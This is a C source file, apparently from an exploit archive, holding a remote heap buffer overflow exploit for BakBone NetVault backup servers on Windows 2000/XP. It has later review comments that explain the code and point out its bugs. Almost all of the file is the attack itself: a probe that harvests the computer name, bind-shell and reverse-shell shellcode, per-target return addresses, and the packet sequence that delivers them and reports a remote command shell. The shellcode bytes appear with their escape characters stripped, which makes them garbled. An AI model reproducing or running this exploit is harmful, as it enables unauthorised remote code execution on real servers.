# Title : BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow Exploit (2)
# Published : 2005-04-01
# Author : class101
# Previous Title : Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow
# Next Title : Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
/*
for more information see class101.org/netv-remhbof.pdf
*/
#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
/* Payload bytes used in the default (3- or 4-argument) mode: main() copies
   strlen(scode1) bytes of this into payload2 at offset k+31914 and never
   modifies it. The byte literals are reproduced exactly as they appear on
   this page and are treated here as opaque author data; they are not
   interpreted or checked. */
char scode1[]=
"x33xC9x83xE9"
"xAFxD9xEExD9x74x24xF4x5Bx81x73x13xBB"
"x1ExD3x6Ax83xEBxFCxE2xF4x47x74x38x25x53xE7x2Cx95"
"x44x7Ex58x06x9Fx3Ax58x2Fx87x95xAFx6FxC3x1Fx3CxE1"
"xF4x06x58x35x9Bx1Fx38x89x8Bx57x58x5Ex30x1Fx3Dx5B"
"x7Bx87x7FxEEx7Bx6AxD4xABx71x13xD2xA8x50xEAxE8x3E"
"x9Fx36xA6x89x30x41xF7x6Bx50x78x58x66xF0x95x8Cx76"
"xBAxF5xD0x46x30x97xBFx4ExA7x7Fx10x5Bx7Bx7Ax58x2A"
"x8Bx95x93x66x30x6ExCFxC7x30x5ExDBx34xD3x90x9Dx64"
"x57x4Ex2CxBCx8AxC5xB5x39xDDx76xE0x58xD3x69xA0x58"
"xE4x4Ax2CxBAxD3xD5x3Ex96x80x4Ex2CxBCxE4x97x36x0C"
"x3AxF3xDBx68xEEx74xD1x95x6Bx76x0Ax63x4ExB3x84x95"
"x6Dx4Dx80x39xE8x4Dx90x39xF8x4Dx2CxBAxDDx76xD3x0F"
"xDDx4Dx5Ax8Bx2Ex76x77x70xCBxD9x84x95x6Dx74xC3x3B"
"xEExE1x03x02x1FxB3xFDx83xECxE1x05x39xEExE1x03x02"
"x5Ex57x55x23xECxE1x05x3AxEFx4Ax86x95x6Bx8DxBBx8D"
"xC2xD8xAAx3Dx44xC8x86x95x6Bx78xB9x0ExDDx76xB0x07"
"x32xFBxB9x3AxE2x37x1FxE3x5Cx74x97xE3x59x2Fx13x99"
"x11xE0x91x47x45x5CxFFxF9x36x64xEBxC1x10xB5xBBx18"
"x45xADxC5x95xCEx5Ax2CxBCxE0x49x81x3BxEAx4FxB9x6B"
"xEAx4Fx86x3Bx44xCExBBxC7x62x1Bx1Dx39x44xC8xB9x95"
"x44x29x2CxBAx30x49x2FxE9x7Fx7Ax2CxBCxE9xE1x03x02"
"x54xD0x33x0AxE8xE1x05x95x6Bx1ExD3x6A";
/* Payload bytes used in the 6-argument mode. Before use, main() overwrites
   4 bytes at scode2[167] and 2 bytes at scode2[173] with the second
   host/port values (gip/gport) and then copies strlen(scode2) bytes into
   payload2 at offset k+31914. Because this is a file-scope array, that
   patching persists for the rest of the process. The byte literals are
   reproduced exactly as they appear on this page and are treated here as
   opaque author data. */
char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"xFCx6AxEBx52" /*modded adjusting jump*/
"xE8xF9xFFxFFxFFx60x8Bx6Cx24x24x8Bx45x3Cx8Bx7Cx05"
"x78x01xEF"
"x83xC7x01" /*modded, adding 1 to edi*/
"x8Bx4Fx17" /*modded, adjusting ecx*/
"x8Bx5Fx1F" /*modded, adjusting ebx, "x20" out, yeahouu ;>*/
"x01xEBxE3x30x49x8Bx34x8Bx01xEEx31xC0x99xACx84xC0"
"x74x07xC1xCAx0Dx01xC2xEBxF4x3Bx54x24x28x75xE3"
"x8Bx5Fx23" /*modded, adjusting ebx*/
"x01xEBx66x8Bx0Cx4B"
"x8Bx5Fx1B" /*modded, adjusting ebx*/
"x01xEBx03x2Cx8Bx89x6Cx24x1Cx61xC3x31xC0x64x8Bx40"
"x30x8Bx40x0Cx8Bx70x1CxADx8Bx40x08x5Ex68x8Ex4Ex0E"
"xECx50xFFxD6x31xDBx66x53x66x68x33x32x68x77x73x32"
"x5Fx54xFFxD0x68xCBxEDxFCx3Bx50xFFxD6x5Fx89xE5x66"
"x81xEDx08x02x55x6Ax02xFFxD0x68xD9x09xF5xADx57xFF"
"xD6x53x53x53x53x43x53x43x53xFFxD0x68x00x00x00x00"
"x66x68x00x00x66x53x89xE1x95x68xECxF9xAAx60x57xFF"
"xD6x6Ax10x51x55xFFxD0x66x6Ax64x66x68x63x6Dx6Ax50"
"x59x29xCCx89xE7x6Ax44x89xE2x31xC0xF3xAAx95x89xFD"
"xFEx42x2DxFEx42x2Cx8Dx7Ax38xABxABxABx68x72xFExB3"
"x16xFFx75x28xFFxD6x5Bx57x52x51x51x51x6Ax01x51x51"
"x55x51xFFxD0x68xADxD9x05xCEx53xFFxD6x6AxFFxFFx37"
"xFFxD0x68xE7x79xC6x79xFFx75x04xFFxD6xFFx77xFCxFF"
"xD0x68xEFxCExE0x60x53xFFxD6xFFxD0";
/* First chunk of the second-connection request. main() overwrites
   scodeA[0..1] with the low bytes of the computed total length `tot`
   (via szb) before sending, and sends sizeof(scodeA)-1 bytes, so the
   embedded zero bytes are part of the message. Literals reproduced as
   they appear on this page. */
char scodeA[] =
"x11x03x00x00x01xCBx22x77xC9x17x00x00x00x69x3Bx69"
"x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69"
"x3Bx73x3Bx00x00x00x00x00xC0x00x00x00x0Cx58x3Cx42"
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00"
"x03x00x00x00x03x00x00x00x00x00x00x00x02x00x00x00";
/* Third chunk of the second-connection request (sent after `payload`).
   main() overwrites scodeB[1..2] with the low bytes of tot2 (tot-192, via
   szb2) before sending sizeof(scodeB)-1 bytes. Literals reproduced as they
   appear on this page. */
char scodeB[] =
"x00x51x02x00x00x00x00x00x00x01x03x05x27xCAx07x00"
"x00x00x73x3Bx62x3Bx6Fx3Bx00";
/* Seventh chunk of the second-connection request (sent after cpname).
   main() copies the two bytes of `szc` to scodeC+254 before sending
   sizeof(scodeC)-1 bytes. Literals reproduced as they appear on this
   page; not interpreted here. */
char scodeC[] =
"x00x00x02x01x00x00x00x8FxD0xF0xCAx0Bx00x00"
"x00x69x3Bx62x3Bx6Fx3Bx6Fx3Bx7Ax3Bx00x11x57x3Cx42"
"x00x01xB9xF9xA2xC8x00x00x00x00x03x00x00x00x00x01"
"xA5x97xF0xCAx05x00x00x00x6Ex33x32x3Bx00x20x00x00"
"x00x10x02x4Ex3FxACx14xCCx0Ax00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x01xA5x97xF0xCAx05x00x00x00x6Ex33x32x3Bx00x20"
"x00x00x00x10x02x4Ex3FxC0xA8xEAxEBx00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x01xA5x97xF0xCAx05x00x00x00x6Ex33x32x3B"
"x00x20x00x00x00x10x02x4Ex3FxC2x97x2CxD3x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00xB9xF9xA2xC8x02x02x00x00x00xA5x97"
"xF0xCAx05x00x00x00x6Ex33x32x3Bx00x20x00x00x00x04"
"x02x4Ex3FxACx14xCCx0AxB0xFCxE2x00x00x00x00x00xEC"
"xFAx8Ex01xA4x6Bx41x00xE4xFAx8Ex01xFFxFFxFFxFFx01"
"x02x00x00x00";
/* NOTE(review): sizeof(scodeD)-1 is added into `tot` in main(), but
   scodeD is never passed to send() anywhere in the visible code, so the
   length field derived from tot includes bytes that are not transmitted.
   Whether that is intentional cannot be told from this file. Literals
   reproduced as they appear on this page. */
char scodeD[] =
"x00x06x00x00x00x0Bx00x00x00x05x00x00x00x54"
"x79x70x65x00x01x00x00x00x01x00x00x00x06x00x00x00"
"x77x69x6Ex6Ex74x00x12x00x00x00x55x44x50x20x46x72"
"x61x67x6Dx65x6Ex74x20x53x69x7Ax65x00x01x00x00x00"
"x01x00x00x00x05x00x00x00x31x34x30x30x00x07x00x00"
"x00x53x65x72x76x65x72x00x01x00x00x00x01x00x00x00"
"x05x00x00x00x54x52x55x45x00x0Cx00x00x00x44x65x73"
"x63x72x69x70x74x69x6Fx6Ex00x00x00x00x00x01x00x00"
"x00x0Ax00x00x00x4Ex56x56x65x72x73x69x6Fx6Ex00x01"
"x00x00x00x01x00x00x00x05x00x00x00x37x30x33x30x00"
"x0Dx00x00x00x4Ex56x42x75x69x6Cx64x4Cx65x76x65x6C"
"x00x01x00x00x00x01x00x00x00x03x00x00x00x33x37x00";
/* Probe message sent on the first connection (sizeof-1 bytes, embedded
   zeros included). main() then reads the reply into recvbuf, copies the
   NUL-terminated run starting at recvbuf[80] into cpname, and builds
   ver2 from recvbuf[rc-37], recvbuf[rc-35] and recvbuf[rc-34]. This
   fixed byte sequence is the only unsolicited traffic the tool generates
   before the second connection. Literals reproduced as they appear on
   this page. */
char grabcpname[] =
"xC9x00x00x00x01xCBx22x77xC9x17x00x00x00x69x3Bx69"
"x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69x3Bx69"
"x3Bx73x3Bx00x00x00x00x00xC0x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x08x00x00x00"
"x03x00x00x00x03x00x00x00x00x00x00x00x0Bx00x00x00"
"x90x90x90x90x90x90x90x90x90x90x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x09x00x00x00x00x00x00x00x00";
// Working buffers. All are file-scope, so they start zero-filled; main()
// relies on that (strlen() on partially written buffers). payload2 is a
// 20 MB static array although main() writes only about 35 KB of it.
char payload[1024],payload2[20000000],recvbuf[1024],ver2[1024],cpname[1024],sz[1024],szb[1024],szb2[1024];
// tot/tot2: request lengths computed in main(); l00p: 0 during the first
// connection, incremented before the `goto loop` that starts the second.
int tot,tot2,l00p=0;
// NOTE(review): sip is 3 bytes and spo is 1 byte, but main() memcpy()s 4
// and 2 bytes into them and then calls strlen() on each, which writes and
// reads past both arrays (undefined behaviour). pad/pad2 are fixed byte
// runs placed into payload2 at fixed offsets; literals reproduced as they
// appear on this page.
char sip[3],spo[1],pad[]="xEBx0A",pad2[]="xE9xF3xFDxFFxFF";
// Per-target 4-byte values; argv[1]==1 selects ret1/ret2, argv[1]==2 selects ret1c/ret4.
char ret1[]="x7Ex6Dx03x75"; //call dword [esi+4C], ws2_32.dll, w2k SP4 EN
char ret1c[]="xBDx9Bx36x7C"; //call dword [edi+74], MSVCR71.dll, XP SP1a-1-0 EN
char ret2[]="xF0xA1x5Cx7C"; //UEF (UnHandledExceptionFilter) w2k sp4 EN
char ret4[]="xB4x73xEDx77"; //UEF XP SP1a-1-0 EN
// padA: 3 zero bytes sent between sz and cpname; szc: 2 bytes copied to scodeC+254.
char padA[]="x00x00x00";
char szc[]="xFFxFF";
// rtlmethod char repair[]="xC7x40x89x60x20xF8x77"; repairing RtlEnterCriticalSection on 2k SP4
//you will prolly need to repair this repair[] for your os :>
//I did it quickly: mov dword ptr [eax-77],77F82060
//for litchfield this method is reliable due to the fixed address 0x7FFDF020
//for me that's a crap method like others known heap exploitations
//because can you reliably repair the functions across all NT-based OSes?, and where to reliably jump...,
//and also the call to drwtsn32, right before ExitProcess(), acts as a breakpoint, and your shellcode will be executed
//once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' ExitProcess() :)
#ifdef WIN32
// Winsock state; initialised by WSAStartup() in main() on every pass of the loop.
WSADATA wsadata;
#endif
// Forward declarations; the definitions follow main() below.
void ver();
void usage(char* us);
void sl(int time);
/*
 * Entry point. argv[1] selects a target profile (1 or 2), argv[2] is the
 * host, argv[3] an optional port (default 20031), and argv[4]/argv[5] an
 * optional second host/port honoured only when argc==6 (argc==5 is rejected).
 * The function body runs twice via the `loop:` label and the global l00p
 * counter: pass one sends grabcpname and parses the reply into cpname and
 * ver2; pass two builds the request chunks and sends them in sequence.
 * Returns 0 on completion and -1 on any argument, socket or reply error.
 */
int main(int argc,char *argv[])
{
ver();
// Declarations after a statement: needs C99 or later (the file targets msvc6/cygwin/Linux).
int check1, check2, rc, i, j, k;
unsigned long gip;
unsigned short gport;
char *what, *where, *os;
// Re-entered by `goto loop` at the end of pass one; every check below runs again.
loop:
// atoi() yields 0 for non-numeric input, which the <1 test rejects.
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
// The XORs with zero are no-ops; gip/gport stay in network byte order.
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
// NOTE(review): sip is char[3] and spo is char[1] (file scope), so these
// copies write past both arrays and the strlen() calls read past them —
// undefined behaviour. The "null byte" checks below therefore depend on
// whatever the linker placed after the arrays.
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...n");return -1;}
}
// POSIX shims for the Win32 names used below and in sl(); defined mid-function,
// so they take effect for the rest of the translation unit.
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
// Runs on every pass of the loop (pass one calls WSACleanup() before looping back).
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup errorn");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
// NOTE(review): same out-of-bounds write/read as the non-Win32 branch (sip[3], spo[1]).
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...n");return -1;}
}
#endif
// NOTE(review): inet_addr() failure (INADDR_NONE) is not checked. htonl() is
// applied here and again when filling server.sin_addr, so the two calls cancel
// and the raw inet_addr() value is what reaches connect().
int ip=htonl(inet_addr(argv[2])), port;
// argv[3] is the port whenever it is present (argc 4 or 6); otherwise 20031.
if (argc==4||argc==6){port=atoi(argv[3]);} else port=20031;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() errorn");return -1;}
// Target profile: `what` and `where` are the two 4-byte values placed into
// payload2 at fixed offsets below; `os` is only used for the banner.
if (atoi(argv[1]) == 1){what=ret1;where=ret2;os="Win2k SP4 Server Englishn[+] Win2k SP4 Pro Englishn";}
if (atoi(argv[1]) == 2){what=ret1c;where=ret4;os="WinXP SP0 Pro. Englishn[+] WinXP SP1 Pro. Englishn[+] WinXP SP1a Pro. Englishn";}
// `os` is assigned only in the two branches above; that is safe only because
// argv[1] was already validated to be 1 or 2.
if (l00p==0){printf("[+] TARGET: %sn",os);sl(1);}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
// NOTE(review): the connect() result is ignored. No non-blocking flag is set
// in the visible code, so this call blocks and the 3 s select() below only
// reports writability after it has already returned.
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() errorn");closesocket(s);return -1;}
case 0: {printf("[+] connect() errorn");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
// Pass one: send the probe and parse the reply into cpname/ver2.
if (l00p==0)
{
printf("[+] connection 1: grabbing computername via netvault...n");
sl(2);
// send() result is not checked here.
send(s,grabcpname,sizeof(grabcpname)-1,0);
// recv() does not NUL-terminate recvbuf; rc is the byte count, 0 on EOF, or -1.
rc = recv(s,recvbuf,sizeof(recvbuf),0);
// NOTE(review): && binds tighter than ||, so the byte test aborts only when
// BOTH recvbuf[13]!='i' (105) and recvbuf[14]!=';' (59). The rc==0 branch
// below is unreachable because rc<400 already covers it. Neither early
// return closes the socket.
if (rc==-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+] not netvault or patched, aborting..n");return -1;}
else if (rc==0){printf("[+] nothing received, not netvault or patched, aborting..n");return -1;}
else printf("[+] analyzing packets, sorting computernamen");
sl(2);
printf("[+] bufsize: %dn",rc);sl(1);
// NOTE(review): scans from offset 80 until a zero byte with no bound on i
// (recvbuf is 1024 bytes, and only rc of them were just received) or on j
// (cpname is 1024 bytes); a reply without a zero byte in range reads past
// recvbuf. cpname keeps its terminator only because the array started zeroed.
for (i=80,j=0;recvbuf[i]!=0;i++,j++)
{
memset(cpname+j,recvbuf[i],1);
}
// sz[0] = strlen(cpname)+1, truncated to one byte.
memset(sz,strlen(cpname)+1,1);
// ver2 = "<b>.<b>.<b>" built from three bytes near the end of the reply (0x2E is '.').
memset(ver2,recvbuf[rc-37],1);memset(ver2+1,0x2E,1);
memset(ver2+2,recvbuf[rc-35],1);memset(ver2+3,0x2E,1);
memset(ver2+4,recvbuf[rc-34],1);
printf("[+] cmpname: %sn",cpname);sl(1);
printf("[+] version: %sn",ver2);sl(1);l00p++;
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
// Pass two restarts from the argument checks with a fresh socket.
goto loop;
}
printf("[+]n[+] connection 2: modding payload regarding computername and lengthn");sl(1);
printf("[+] loading attackn");sl(1);
/*the cpname length is important, that's why we reajust EAX and ECX
function of cpnamelength.*/
// NOTE(review): k is an int computed from a size_t; a cpname longer than 7
// bytes makes k negative, and every payload2+k+... offset below then points
// before the array (undefined behaviour). cpname's length is never checked.
k=7-strlen(cpname);
memset(payload,0x41,1);
// rtlmethod memset(payload2,0x90,k+32417); rtl
// rtlmethod memcpy(payload2+k+32417,"x1CxF0xFDx7F",4);
// rtlmethod memcpy(payload2+k+32421,"x1Ax9ExEAx00",4);
// rtlmethod memcpy(payload2+k+31902, repair, 7);
// Fill payload2 with 0x90 up to k+35431, then place pad/what/where/pad2 at
// fixed offsets relative to k.
memset(payload2,0x90,k+35431);
memcpy(payload2+k+32413,pad,2);memcpy(payload2+k+32417,what,4);memcpy(payload2+k+32421,where,4);memcpy(payload2+k+32426,pad2,5);
if (argc==6)
{
// Patches the file-scope scode2 in place at fixed offsets, then copies it
// (strlen-bounded, so up to its first zero byte) into payload2.
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload2+k+31914,scode2,strlen(scode2));
}
else memcpy(payload2+k+31914,scode1,strlen(scode1));
// Total length of everything sent below, plus scodeD, which is counted but
// never sent in the visible code.
tot=sizeof(padA)-1+sizeof(scodeA)-1+sizeof(scodeB)-1+sizeof(scodeC)-1+sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
tot2=tot-192;
// NOTE(review): copies the low two bytes of an int in host byte order
// (little-endian assumed). strlen(szb) then yields 0, 1 or 2 depending on
// which of those bytes is zero, so the length field may be left partly
// unpatched. The same applies to szb2/scodeB.
memcpy(szb,&tot,2);memcpy(&scodeA[0],&szb,strlen(szb));
memcpy(szb2,&tot2,2);memcpy(&scodeB[1],&szb2,strlen(szb2));
memcpy(scodeC+254,szc,2);
printf("[+] sh0uting the heap!n");sl(3);
// Each send() is checked for -1 only: short sends are not handled, and the
// socket is not closed before returning on error.
if (send(s,scodeA,sizeof(scodeA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,scodeB,sizeof(scodeB)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,sz,strlen(sz),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,padA,sizeof(padA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,cpname,strlen(cpname),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,scodeC,sizeof(scodeC)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.n");return -1;}
sl(6);
printf("[+]n[+] size of payload: %dn",tot);
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shelln");}
else printf("[+] payload sent, use telnet %s:101 to get a shelln",inet_ntoa(server.sin_addr));
// Returns without closesocket()/WSACleanup(); the OS reclaims the socket at exit.
return 0;
}
}
// Reached only when select() reported readiness but FD_ISSET() is false.
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
/* Print the command-line synopsis and target table to stdout.
   `us` (the program name) is accepted to match the call sites but does
   not appear in the text, which names the executable literally. */
void usage(char* us)
{
    static const char *const lines[] = {
        " n",
        "[+] . 101_netvault.exe Target VulnIP (bind mode) n",
        "[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) n",
        "[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT reverse mode) n",
        "TARGETS: n",
        "[+] 1. Win2k SP4 Server English (*) - v5.0.2195 n",
        "[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 n",
        "[+] 2. WinXP SP0 Pro. English - v5.1.2600 n",
        "[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 n",
        "[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 n",
        "NOTE: n",
        "The exploit bind a cmdshell port 101 or n",
        "reverse a cmdshell on your listener. n",
        "A wildcard (*) mean tested working, else, supposed working. n",
        "A symbol (-) mean all. n",
        " Compilation msvc6, cygwin, Linux. n",
        " n",
    };
    size_t count = sizeof lines / sizeof lines[0];
    (void)us;
    /* None of the lines contains a '%', so fputs() emits exactly what printf() did. */
    for (size_t idx = 0; idx < count; idx++) {
        fputs(lines[idx], stdout);
    }
}
/* Print the fixed program banner to stdout. */
void ver()
{
    static const char *const banner[] = {
        " n",
        "============================[v0.1]====n",
        "=====BakBone NetVault, Backup Server===============n",
        "=====Clientname, Remote Heap Overflow Exploit==========n",
        "====coded by class101======[Hat-Squad.com 2005]=====n",
        "============================================n",
        " n",
    };
    size_t count = sizeof banner / sizeof banner[0];
    /* No '%' in any line, so fputs() produces the same bytes as the original printf() calls. */
    for (size_t idx = 0; idx < count; idx++) {
        fputs(banner[idx], stdout);
    }
}
/* Pause for `time` seconds. On Win32, Sleep() takes milliseconds; on other
   platforms `Sleep` is a macro for sleep() that main() defines earlier in
   this file, so the argument is passed through unchanged. */
void sl(int time)
{
#ifdef WIN32
    int millis = time * 1000;
    Sleep(millis);
#else
    int secs = time;
    Sleep(secs);
#endif
}
// www.Syue.com [2005-04-01]